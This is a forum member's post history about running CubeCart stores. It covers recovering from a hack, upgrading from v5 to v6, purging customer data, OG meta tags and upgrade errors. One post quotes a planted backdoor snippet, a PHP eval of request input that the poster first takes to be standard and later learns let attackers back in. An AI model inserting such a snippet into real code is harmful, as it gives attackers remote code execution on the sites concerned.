Jump to content

QuotesUK

Member
  • Posts

    77
  • Joined

  • Last visited

Everything posted by QuotesUK

  1. I was hacked by the same people - https://forums.cubecart.com/topic/50393-upgrade-v5-to-v6-and-clean-install/ I did not need to submit a reconsideration request - Google spotted the cleanup and removed their may be hacked notice Removing the snippet is essential - I didn’t do this first time around and they got back in.
  2. Fortunately I did a backup after completing my purge/upgrade, so I have something decent to fall back onto. After completing the rollback I will delete the snippet, switch to a new skin and dispose of the old, and then carry out a visual review of what is stored in the database. Thank you bsmither
  3. Oh No! I have to kick myself for that one It says the trigger is "controller.index"
  4. Yes. When I purged the old site (v5.2.9) I upgraded all the way to v6.0.8. There weren’t any hooks or code snippets to remove - just the one snippet that I left in called snippetABCd1 ... <?php eval($_REQUEST["ABCd1"]);?> which I see across all my Cubecart installs except the ABCd1 bit changes from site to site. I assume this snippet is common to everyone?
  5. Unfortunately, the site was hacked again by the same people. It appears there was something still lurking in either the database or the skin files. Is there any way to export product listings data, for example to XML, so that I can do a completely fresh install.
  6. (assuming the customer select all feature is added) If the customer has 0 orders then they can be removed via the customer list If the customer has >0 orders then they can't be removed via the customer list, because their order history need to be removed first On the orders page you can't see a count of their orders, so you can't sort by it. This means that you can't identify whether any particular order belongs to a customer with a 1-order history or a 6-order history. So if I wanted to remove all the orders for customers with just a 1-order history I can't see which orders those are. However, on the orders page if I sort by customer name, you can visually locate customers with more than one order because they will be grouped together. This makes it possible to cherry pick those with a 1-order history. The issue is that you can't paginate on this basis, making the general "check-all on page" ineffective.
  7. In the admin area, when I go to the customer list, the footer pagination says [1] 2 3 > … 158 View All A side issue is that the list of orders page doesn't tell you the total number of orders by that customer. That would be handy to have for this task because If (say) someone has placed 5 or 6 orders I wouldn't want to remove their order history. However I can sort by customer name, so there is a way forward with that. Thank you for offering to help - I have sent you a pm
  8. I think that purging obsolete records should be a routine task for everyone. Unfortunately e-commerce culture encourages hoarding of data so I can appreciate it isn’t going to be top of the agenda for many people. In earlier versions of CubeCart I used to purge my customer records every six months or so using MySQL. Well done - the check/uncheck all feature at the bottom of the orders page is exactly what would achieve this. As far as the limitation on removal of customers with at least one order, presumably all that needs to happen is some purging of the orders records beforehand.
  9. This is just a pro-active initiative to remove obsolete customer records, so that if the store is ever hacked we have 200 upset people rather than 4000. If I had to go through 150 pages one at a time that would be tedious but possible. However there isn’t a “select all” option at the bottom of the page. There is the possibility of using a MySQL admin tool to sort by order count and delete rows in bulk but I would imagine this could create problems with order linking.
  10. How do I (safely) remove customer accounts? I have a store with 4000 customer accounts. Many customers registered but did not place an order. Some only ordered once. A few ordered several times. It is good practice to remove customer data that is no longer needed but it appears that CubeCart does not have a tool for this. What I would like to do: - remove all customer accounts that did not place an order - remove all customer accounts that placed only one order but excluding those from the last two months Suggestions?
  11. Then nuke the site ... it's the only way to be sure Your instructions were excellent After upgrading I changed the database password on the server, and in the globals.inc.php file. I also changed all the admin passwords. I made a small tweak to the logo skin allocation settings. The payment/shipping options weren't carried over but installing new plugins was straightforward. As always, hugely grateful for your support.
  12. I have a v5 installation that was compromised by the recent security flaw. I want to upgrade to v6 and be sure that the site is purged of any hidden files left by the hacker. Which approach would you recommend: 1/ rollback to a safe backup, lose all new customer data, then upgrade 2/ upgrade with compromised site, delete all cubecart files, then upload files from latest .zip installation pack Am I right to assume that the method in (2) will work?
  13. I have the AddThis social module enabled. However there are serious shortcomings. Firstly, the OG tags aren't inserted on the home page (because AddThis is only enabled for product pages) Secondly, on product pages it uses the cached thumbnail as the OG:Image source, which fails Facebook’s minimum dimension sizes. So instead of the product image, which needs to be a minimum of 200x200px, it grabs the store logo, and crops it badly Also, description and title OG tags are missing It looks like I'm going to have to hack out that code and replace with boilerplate that works
  14. Thank you. I understand the concept but not the practicalities. Where do I make the edit, or place the files? Could it be replaced during upgrades? If it can, then I might as well just hack the skin template (Kurouto).
  15. Does anyone know if there is a plugin to manage additional meta tag insertion? I would like to add Facebook OG meta tags to my v6 CubeCart installation but I would prefer to manage via a plugin, rather than hack the template, so that I know that future upgrades can replace the template code without affecting my extra code. Ideally the plugin needs to just insert whatever text is entered into the HTML header before the closing head markup. Similar plugin functionality is available for Wordpress.
  16. Is there a way of slowing down the way the Sidebar toggles down for sub-categories? I don't mind the way that it toggles down but it is very trigger happy, and you only have to move your cursor over the sidebar before it starts expanding. It usually means you have to start chasing the menu item you are after, or stealthily approach it from the side. Here is the code from /skins/kurouto/js/script.js... /* Custom JavaScript for default template */ /* Acordion menu (only opens, doesn't collapse) */ $('#menu.accordion a ~ ul').each(function(){ $(this).siblings('a:first').addClass('menu_closed').hover(function(){ $(this).addClass('menu_open').siblings('ul').slideDown(); return; }); });
  17. I'm sticking by my original comments. When I said I'm not overwhelmed by the demo version of CCv6 I wasn't commenting on the technical aspects, which are admirable. However step back for a minute and look at the design and ask yourself whether a client would accept the look of this store straight out of the box and the answer is a firm no. The typography is all over the place. Maybe it ticks all the boxes for admins but a more refined default skin is definitely needed as it moves through development.
  18. I have been using CubeCart for many years and see this as a positive move. It paves the way for third party refinement in core modules and renews customer focus for the support team... in theory anyone could offer support services so they will have to keep delivering 1st class support or lose out to a rival support team. However I'm not overwhelmed by the demo version of CCv6 so I think I'll be sticking with v5 for my clients for a while. I hope Al doesn't mind but I've set up a quick poll on Upvote / Downvote to see which way the wind is blowing on this issue. You don't need to login or register to participate, just click on the Up or Down buttons and tweet your vote. Upvote / Downvote - http://upvoting.com/vote/475 Best wishes to CubeCart - I hope this move works out okay
  19. Not sure where this feedback bug should go but I found a problem in the CCv6 demo When you add to basket a product with a required option - you get a warning that you have to select from the dropdown menu (in my test it said £50 yes please). Then select the option (as advised) and go to checkout. You will find the number of products listed in the cart is 2, The problem is that if a customer sees a red warning box for a required option they aren't going to expect the 'failed' click to place anything into the cart.
  20. By broken I just mean it was working, now not. The links themselves are correctly formatted but the destination servers have changed. I also get a blank page unless I re-request. I also get a certificate warning on Devellion.com ... The link errors are flagged in the W3C link checker. I respect the presence of the copyright footer but it makes no sense to provide links that point to blank pages or those with certificate warnings, so I'd rather fix this than use CSS to mask the problem. I'm sure CubeCart Ltd would find it in their interest to have more inward links pointing to their site(s). Rather than reveal the obfuscated code perhaps a replacement file would be more appropriate.
  21. How do I fix the copyright footer in CubeCart v3? This code doesn't appear in the source files because it relates to the copyright/license removal but the URLs are now broken by changes to HTTPS... is this data hosted by CubeCart servers? <div class='txtCopyright'>Powered by <a href='http://www.cubecart.com' class='txtCopyright' target='_blank'>CubeCart</a>&trade;<br />Copyright <a href='http://www.devellion.com' class='txtCopyright' target='_blank'>Devellion Limited</a> 2006. All rights reserved.</div></body>
  22. bsmither, your patch with the trim function removed the space character from my warning message I'm just wondering, do you think there is a way of just inserting a value for the download path that skips all of the (broken) routines that are supposed to assemble the path? Or is it the error routine giving us a false positive on the file not found? Seems bizarre that this should break on this upgrade when it has worked for so many upgrades before. I would assume that either CubeCart changed their download location or it's the http(s) changes as a result of Poodle SSL.
  23. My server is running php v5.3.3 I do not have a problem creating backups (even though the server log file has warnings) I am still unable to upgrade to CubeCart v5.2.14 Anyone else that is similarly affected may like to see the official bug report here... https://github.com/cubecart/CubeCart/issues/199
  24. I don't know what the exact version was around Feb 2013 but that was when a clean install was carried out. I have been patching to latest versions as they come out. Just wanted to reassure you that I have a standard install. This issue now appears more complex than code typos so here is my info from server error logs (domain redacted to example.com)... mod_fcgid: stderr: PHP Warning: krsort() expects parameter 1 to be array, null given in /var/www/vhosts/example.com/httpdocs/admin/sources/maintenance.index.inc.php on line 503 mod_fcgid: stderr: PHP Warning: Invalid argument supplied for foreach() in /var/www/vhosts/example.com/httpdocs/admin/sources/maintenance.index.inc.php on line 505 mod_fcgid: stderr: PHP Warning: Invalid argument supplied for foreach() in /var/www/vhosts/example.com/httpdocs/admin/sources/maintenance.index.inc.php on line 498 Additional info, the code around these lines is about backups - I have already taken backups - downloaded and then deleted - so there are no online backups present. I tried creating a new database backup and upgrading but still get the same error. I also cleared caches.
×
×
  • Create New...